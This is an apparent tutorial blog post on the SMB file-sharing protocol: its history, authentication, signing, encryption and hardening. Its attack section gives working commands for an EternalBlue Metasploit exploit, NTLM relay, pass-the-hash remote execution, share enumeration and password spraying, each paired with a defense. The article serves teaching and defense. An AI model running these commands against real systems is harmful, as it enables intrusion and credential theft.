SMB — The Protocol That Runs (and Haunts) Enterprise Networks
If you work in a Windows environment, you use SMB every day — probably without knowing it. Every time you access a shared drive (\\server\share), open a file on a network share, or your Group Policy updates from the domain controller’s SYSVOL — that’s SMB.
SMB (Server Message Block) is the protocol that enables file sharing, printer sharing, and inter-process communication on Windows networks. It’s been around since the 1980s, it’s deeply embedded in Windows infrastructure, and it’s responsible for some of the most catastrophic cyberattacks in history.
WannaCry (2017) — infected 230,000+ computers across 150 countries in a single day. The propagation mechanism? SMB exploit (EternalBlue).
NotPetya (2017) — caused over $10 billion in damages globally. Propagation? SMB (EternalBlue + NTLM credential theft).
Every Active Directory pentest ever — lateral movement via SMB, NTLM relay via SMB, credential extraction via SMB.
Understanding SMB is essential if you work in networking, security, or system administration.
What is SMB?
SMB (Server Message Block) is a client-server protocol for sharing access to files, printers, serial ports, and other resources on a network. It operates at the Application Layer (Layer 7 of the OSI model) and typically runs on top of TCP/IP.
The core use cases:
| Use Case | Example |
|---|---|
| File sharing | Accessing \\fileserver\documents from your workstation |
| Printer sharing | Printing to a network printer via \\printserver\LaserJet |
| Named pipes | Inter-process communication (IPC) — used by Windows services, RPC |
| Remote administration | PsExec, smbexec, administrative shares (C$, ADMIN$) |
| Group Policy | Workstations reading GPOs from \\domain\SYSVOL |
| Browsing | The “Network” section in File Explorer |
When you type a UNC path like \\server\share\file.txt in Windows, the OS establishes an SMB session, authenticates (usually with your current domain credentials via Kerberos or NTLM), and streams the file over the network.
SMB Versions — A Brief History
| Version | Year | Key Changes |
|---|---|---|
| SMB 1.0 / CIFS | 1983/1996 | Original protocol. Chatty, insecure, no encryption |
| SMB 2.0 | 2006 (Vista) | Reduced chattiness, larger reads/writes, better performance |
| SMB 2.1 | 2010 (Win 7) | Large MTU support, leasing (oplock improvements) |
| SMB 3.0 | 2012 (Win 8) | Encryption, multichannel, RDMA, transparent failover |
| SMB 3.0.2 | 2014 (Win 8.1) | Cluster dialect fencing |
| SMB 3.1.1 | 2015 (Win 10) | Pre-authentication integrity, encryption negotiation, AES-128-GCM |
The critical security boundary: SMB 1.0 is fundamentally insecure and should be disabled everywhere. EternalBlue (the WannaCry exploit) targeted SMB 1.0. Microsoft has been pushing to deprecate it since 2017, and Windows 10/11 and Server 2019+ have it disabled by default.
How SMB Works
The Basics
SMB operates on TCP port 445 (direct SMB over TCP). Historically, it also ran over NetBIOS on ports 137-139, but modern SMB uses port 445 exclusively.
An SMB session follows this flow:
Client Server
| |
| 1. TCP connection (port 445) |
| ────────────────────────────────────> |
| |
| 2. Negotiate (which SMB version?) |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 3. Session Setup (authenticate) |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 4. Tree Connect (access a share) |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 5. Open / Read / Write / Close |
| ────────────────────────────────────> |
| <──────────────────────────────────── |
| |
| 6. Tree Disconnect / Logoff |
| ────────────────────────────────────> |
Steps 1-2: Negotiate
The client and server agree on the highest SMB version both support. In SMB 3.1.1, this step also includes pre-authentication integrity — the negotiation messages are hashed (SHA-512) to prevent tampering. This prevents downgrade attacks where an attacker forces SMB 1.0.
Step 3: Session Setup (Authentication)
The client authenticates, typically using:
- Kerberos — Default in domain environments. Ticket-based, secure.
- NTLM — Fallback when Kerberos isn’t available (IP access, cross-forest, workgroup).
In domain environments, this is usually transparent — your Windows session already has a Kerberos TGT, and the SMB client requests a service ticket for the file server automatically. You never see a login prompt.
Step 4: Tree Connect
After authentication, the client connects to a specific share — a named resource on the server. The share name is the part after the server name in a UNC path:
\\SERVER\Documents → share name is "Documents"
\\SERVER\C$ → share name is "C$" (administrative share)
\\SERVER\IPC$ → share name is "IPC$" (inter-process communication)
Step 5: File Operations
Once connected, the client can open files, read data, write data, list directories, and perform other file operations — just like accessing a local filesystem.
Shares
Regular Shares
Created by administrators and visible in the network browser:
# List shares on a server (from Windows)
> net view \\fileserver
Shared resources at \\fileserver
Share name Type Comment
------------------------------------------
Documents Disk Company documents
Public Disk Public files
Printers Print Shared printers
Administrative Shares (Hidden)
Windows automatically creates hidden shares for each drive and for admin access:
| Share | Maps To | Access |
|---|---|---|
| C$ | C:\ | Local admins only |
| D$ | D:\ | Local admins only |
| ADMIN$ | C:\Windows | Local admins only |
| IPC$ | Named pipes | Authenticated users |
These shares have a $ suffix, making them hidden from casual browsing — but they’re fully accessible to anyone with local admin credentials. This is how tools like PsExec work: they copy an executable to ADMIN$ and create a remote service.
# Access the C drive of a remote server (needs admin)
> dir \\fileserver\C$
IPC$ — The Special One
IPC$ (Inter-Process Communication) is used for named pipes — a mechanism for processes to communicate over the network. It’s the foundation for:
- Remote Procedure Calls (RPC)
- Remote service management (sc.exe)
- Remote registry access
- SMB enumeration (listing shares, users, groups)
A null session (anonymous IPC$ connection) was a classic attack vector on older Windows versions — it allowed unauthenticated enumeration of users, groups, and shares. Modern Windows restricts this by default, but misconfigurations still occur.
SMB on the Wire — Packet Structure
An SMB2 packet has this structure:
┌──────────────────────────────────────┐
│ NetBIOS Session Header (4 bytes) │
├──────────────────────────────────────┤
│ SMB2 Header (64 bytes) │
│ - Protocol ID (0xFE 'S' 'M' 'B') │
│ - Command (Negotiate, TreeConnect, │
│ Create, Read, Write, Close, etc.) │
│ - Message ID (for async tracking) │
│ - Session ID │
│ - Tree ID │
│ - Signature (if signing enabled) │
├──────────────────────────────────────┤
│ Command-specific payload │
│ (varies by command) │
└──────────────────────────────────────┘
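To make the header layout above concrete, here is an added Python parser (example code, not from the original article) that decodes a NetBIOS-framed SMB2 message into its command, flags, IDs and signature field; the command table it uses is the numbering from MS-SMB2, which is also what Wireshark's smb2.cmd filter matches on. The frame builder exists only to construct sample input for the parser.

```python
import struct

# SMB2 command codes (MS-SMB2 2.2.1); the same values Wireshark's smb2.cmd filter uses.
SMB2_COMMANDS = {
    0: "NEGOTIATE", 1: "SESSION_SETUP", 2: "LOGOFF", 3: "TREE_CONNECT",
    4: "TREE_DISCONNECT", 5: "CREATE", 6: "CLOSE", 7: "FLUSH", 8: "READ",
    9: "WRITE", 10: "LOCK", 11: "IOCTL", 12: "CANCEL", 13: "ECHO",
    14: "QUERY_DIRECTORY", 15: "CHANGE_NOTIFY", 16: "QUERY_INFO",
    17: "SET_INFO", 18: "OPLOCK_BREAK",
}
SMB2_FLAGS_SERVER_TO_REDIR = 0x1  # set on responses
SMB2_FLAGS_SIGNED = 0x8           # the 16-byte Signature field is populated
# 64-byte SMB2 header, little-endian: ProtocolId, StructureSize, CreditCharge, Status,
# Command, Credits, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
SMB2_HEADER = struct.Struct("<4sHHIHHIIQIIQ16s")

def parse_smb2_message(data: bytes) -> dict:
    """Parse one NetBIOS-framed SMB2 message as it arrives on TCP 445."""
    if len(data) < 4 + SMB2_HEADER.size:
        raise ValueError("truncated: need 4-byte NetBIOS header + 64-byte SMB2 header")
    # NetBIOS session header: 1 byte type (0x00 = session message), 3-byte big-endian length
    nb_type, nb_len = data[0], int.from_bytes(data[1:4], "big")
    if nb_type != 0 or nb_len != len(data) - 4:
        raise ValueError("bad NetBIOS session header")
    (proto, size, _charge, _status, cmd, _credits, flags, _next, msg_id,
     _reserved, tree_id, sess_id, sig) = SMB2_HEADER.unpack_from(data, 4)
    if proto != b"\xfeSMB":  # 0xFF 'S' 'M' 'B' would be an SMB1 packet
        raise ValueError("not an SMB2 header")
    if size != 64:
        raise ValueError("bad StructureSize")
    return {
        "command": SMB2_COMMANDS.get(cmd, f"UNKNOWN({cmd})"),
        "is_response": bool(flags & SMB2_FLAGS_SERVER_TO_REDIR),
        "signed": bool(flags & SMB2_FLAGS_SIGNED),
        "message_id": msg_id, "tree_id": tree_id, "session_id": sess_id,
        "signature": sig, "payload": data[4 + SMB2_HEADER.size:],
    }

def build_smb2_message(cmd, flags=0, msg_id=0, tree_id=0, sess_id=0,
                       payload=b"", signature=b"\x00" * 16) -> bytes:
    """Build a constructed sample frame for exercising the parser (not a real client)."""
    hdr = SMB2_HEADER.pack(b"\xfeSMB", 64, 1, 0, cmd, 1, flags, 0,
                           msg_id, 0, tree_id, sess_id, signature)
    body = hdr + payload
    return b"\x00" + len(body).to_bytes(3, "big") + body
```

Feeding it the raw TCP payload of a real capture (for example bytes exported from Wireshark) works the same way, one NetBIOS-framed message at a time.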
You can capture and analyze SMB traffic with Wireshark:
# Capture SMB traffic on an interface
$ sudo tshark -i eth0 -f "tcp port 445" -Y "smb2"
# Filter specific operations (SMB2 command codes: 5 = Create, 6 = Close, 8 = Read, 9 = Write)
$ tshark -r capture.pcap -Y "smb2.cmd == 8 && smb2.flags.response == 0"   # Read requests
$ tshark -r capture.pcap -Y "smb2.cmd == 9 && smb2.flags.response == 0"   # Write requests
SMB Security Features
SMB Signing
SMB signing adds a cryptographic signature to each SMB packet, preventing man-in-the-middle and NTLM relay attacks. The signature is computed using the session key derived during authentication.
Signed packet:
┌────────────────────────┐
│ SMB Header │
│ ... │
│ Signature: HMAC-SHA256 │ ← computed over the entire packet
│ ... │
├────────────────────────┤
│ Payload │
└────────────────────────┘
If an attacker modifies the packet (e.g., in an NTLM relay), the signature won’t match and the server rejects it.
Status by default:
| System | Signing |
|---|---|
| Domain Controllers | Required (both client and server) |
| Domain Members | Enabled but not required |
| Workgroup / Standalone | Disabled |
The critical gap: domain members enable but don’t require signing. This means SMB signing only happens when both sides require it. If the server doesn’t require signing, a relay attacker can strip it. This is why enforcing SMB signing on all systems is a top security recommendation.
# Check SMB signing configuration
Get-SmbServerConfiguration | Select EnableSecuritySignature, RequireSecuritySignature
# Enforce signing (via Group Policy or PowerShell)
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
SMB Encryption (SMB 3.0+)
SMB 3.0 introduced transport encryption — the entire SMB session is encrypted using AES-128-CCM (SMB 3.0) or AES-128-GCM (SMB 3.1.1).
This encrypts the payload — file contents, directory listings, everything. Even if an attacker captures the traffic, they can’t read it.
# Enable encryption on a share
Set-SmbShare -Name "Confidential" -EncryptData $true
# Require encryption server-wide
Set-SmbServerConfiguration -EncryptData $true -Force
# Reject unencrypted clients
Set-SmbServerConfiguration -RejectUnencryptedAccess $true -Force
SMB 3.1.1 Pre-Authentication Integrity
SMB 3.1.1 hashes the negotiate and session setup messages using SHA-512. This creates a pre-authentication integrity hash that prevents downgrade attacks — an attacker can’t tamper with the negotiation to force an older, weaker protocol version.
SMB Attacks
EternalBlue (MS17-010)
The most infamous SMB vulnerability. Developed by the NSA, leaked by the Shadow Brokers in April 2017, and used in WannaCry and NotPetya within months.
EternalBlue exploits a buffer overflow in the SMBv1 server (srv.sys) during the handling of Transaction 2 requests. A specially crafted SMB packet triggers the overflow, allowing remote code execution with SYSTEM privileges — no authentication required.
# Check if a host is vulnerable
$ nmap --script smb-vuln-ms17-010 -p 445 target
# Exploit with Metasploit
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 10.0.0.5
msf> exploit
Defense: Disable SMB 1.0 and apply the MS17-010 patch. On modern Windows (10/11, Server 2019+), SMBv1 is disabled by default.
# Disable SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
NTLM Relay via SMB
When SMB signing is not required, an attacker can relay NTLM authentication to a different server. We covered this in the Active Directory article, but here’s the SMB-specific version:
Victim ──(NTLM auth)──> Attacker ──(relayed auth)──> Target Server
- Attacker poisons LLMNR/NBT-NS to intercept a victim’s SMB connection
- Victim’s machine sends NTLM authentication to the attacker
- Attacker relays the authentication to a target server (a different machine)
- Target server accepts the authentication (signing not required)
- Attacker has an authenticated SMB session as the victim on the target
# Start the relay
$ ntlmrelayx.py -t smb://10.0.0.5 -smb2support
# Or with specific action
$ ntlmrelayx.py -t smb://10.0.0.5 -c "whoami" -smb2support
Defense: Enforce SMB signing on all systems. Disable LLMNR and NBT-NS.
SMB Enumeration
With valid credentials (or sometimes even without), attackers enumerate shares, users, and groups:
# List shares
$ smbclient -L //10.0.0.5 -U 'user%password'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk Company docs
IPC$ IPC Remote IPC
# Access a share
$ smbclient //10.0.0.5/Documents -U 'user%password'
smb: \> ls
smb: \> get confidential.docx
# Enumerate users via RPC over IPC$
$ rpcclient -U 'user%password' 10.0.0.5
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
# Comprehensive enumeration
$ enum4linux -a 10.0.0.5
PsExec / Remote Execution via SMB
PsExec (and its Impacket equivalent) uses SMB to achieve remote command execution:
- Connect to the ADMIN$ or C$ share
- Upload a service executable
- Create and start a Windows service via RPC (over IPC$)
- The service executes the command
- Output is piped back over a named pipe
# Impacket's psexec (password and target host are placeholders)
$ psexec.py domain/admin:password@10.0.0.5
# With pass-the-hash
$ psexec.py domain/admin@10.0.0.5 -hashes :ntlm_hash
# smbexec (doesn't drop a binary — more stealthy)
$ smbexec.py domain/admin:password@10.0.0.5
Defense: Restrict local admin access, use LAPS for local admin passwords, monitor for service creation events (Event ID 7045).
Password Spraying via SMB
Test a small set of passwords against many accounts:
$ crackmapexec smb 10.0.0.0/24 -u users.txt -p 'Password123!' --continue-on-success
SMB 10.0.0.5 445 DC01 [+] CORP\jsmith:Password123!
SMB 10.0.0.12 445 WS01 [+] CORP\admin:Password123!
Defense: Smart lockout policies, monitor for distributed failed logons.
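As a defender-side illustration of the "monitor for distributed failed logons" advice, this added Python example (not from the original article) runs a sliding-window spray detector over constructed records shaped like Windows Security Event 4625, and shows the caveat that a short window misses low-and-slow spraying. Field names and sample values are assumptions for the example, not a real log format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def _ev(t, src, acct, eid=4625, ltype=3):
    return {"time": t, "id": eid, "logon_type": ltype, "src_ip": src, "account": acct}

# Constructed sample records shaped like Windows Security Event 4625 (failed logon).
# Logon Type 3 = network logon, which is what SMB authentication produces.
SAMPLE_EVENTS = (
    # one source, six different accounts in six seconds: a classic spray
    [_ev(f"2024-05-01T09:00:{s:02d}", "10.0.0.99", a) for s, a in
     enumerate(["jsmith", "mjones", "rlee", "tkim", "admin", "svc_backup"])]
    # one user mistyping their own password (last one interactive): not a spray
    + [_ev("2024-05-01T09:05:00", "10.0.0.7", "bwong"),
       _ev("2024-05-01T09:05:30", "10.0.0.7", "bwong"),
       _ev("2024-05-01T09:06:00", "10.0.0.7", "bwong", ltype=2)]
    # low-and-slow: five accounts, one attempt every 30 minutes
    + [_ev(f"2024-05-01T{9 + m // 60:02d}:{m % 60:02d}:00", "10.0.0.50", a)
       for m, a in zip(range(0, 150, 30), ["ahall", "bkhan", "cdiaz", "dnair", "eross"])]
)

def detect_spraying(events, min_accounts=5, window_minutes=10):
    """Return {src_ip: sorted account list} for sources whose failed network logons
    span at least `min_accounts` distinct accounts inside a `window_minutes` window."""
    window = timedelta(minutes=window_minutes)
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625 and e["logon_type"] == 3:
            by_src[e["src_ip"]].append((datetime.fromisoformat(e["time"]), e["account"]))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):  # sliding window over this source's attempts
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            accounts = {acct for _, acct in attempts[start:end + 1]}
            if len(accounts) >= min_accounts:
                hits[src] = sorted(accounts)
                break
    return hits
```

With the default 10-minute window only 10.0.0.99 is flagged; widening it to a few hours also catches 10.0.0.50, which is why lockout and detection thresholds need to be tuned together rather than in isolation.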
Configuring SMB Securely
Disable SMBv1 (Critical)
# Windows 10/11
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
# Windows Server
Remove-WindowsFeature FS-SMB1
# Verify
Get-SmbServerConfiguration | Select EnableSMB1Protocol
Enforce Signing
Via Group Policy:
Computer Configuration → Policies → Windows Settings → Security Settings
→ Local Policies → Security Options
→ "Microsoft network server: Digitally sign communications (always)" → Enabled
→ "Microsoft network client: Digitally sign communications (always)" → Enabled
Enable Encryption
# Per-share
Set-SmbShare -Name "Finance" -EncryptData $true
# Server-wide
Set-SmbServerConfiguration -EncryptData $true
Restrict Access
# Disable administrative shares (C$, ADMIN$)
# Registry: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
# AutoShareServer = 0 (servers), AutoShareWks = 0 (workstations)
# Restrict who can access shares
Grant-SmbShareAccess -Name "Documents" -AccountName "CORP\Engineering" -AccessRight Full
Revoke-SmbShareAccess -Name "Documents" -AccountName "Everyone"
Audit SMB Access
# Enable SMB auditing
Set-SmbServerConfiguration -AuditSmb1Access $true
# Check for SMBv1 usage
Get-SmbSession | Where-Object Dialect -lt "2.0.2"
SMB vs NFS — When to Use What
| Aspect | SMB | NFS |
|---|---|---|
| Primary OS | Windows | Linux/Unix |
| Authentication | Kerberos/NTLM (user-based) | Kerberos/AUTH_SYS (host or user-based) |
| Encryption | Built-in (SMB 3.0+) | Kerberos encryption or IPsec |
| Port | 445 | 2049 |
| Performance | Optimized for Windows | Optimized for Linux |
| Best for | Windows file sharing, AD environments | Linux servers, HPC, containers |
In mixed environments, you’ll often see both — SMB for Windows workstations accessing file shares, NFS for Linux servers mounting shared storage.
Final Thoughts
SMB is one of those protocols you can’t avoid if you work with Windows. It’s everywhere — file shares, Group Policy, authentication, remote administration, printer access. And because it’s everywhere, it’s one of the biggest attack surfaces in enterprise networks.
The security story of SMB is really a story of two eras. SMB 1.0 was designed in the 1980s when nobody worried about network attackers — it’s fundamentally broken and should be disabled everywhere. SMB 3.1.1, on the other hand, has encryption, pre-authentication integrity, signing, and secure negotiation. The protocol itself is solid — the problems come from misconfigurations (signing not enforced) and legacy deployments (SMBv1 still enabled).
If you take three things from this article: disable SMBv1, enforce signing on all systems, and enable encryption for sensitive shares. Those three settings eliminate the majority of SMB-based attacks.
Thanks for reading!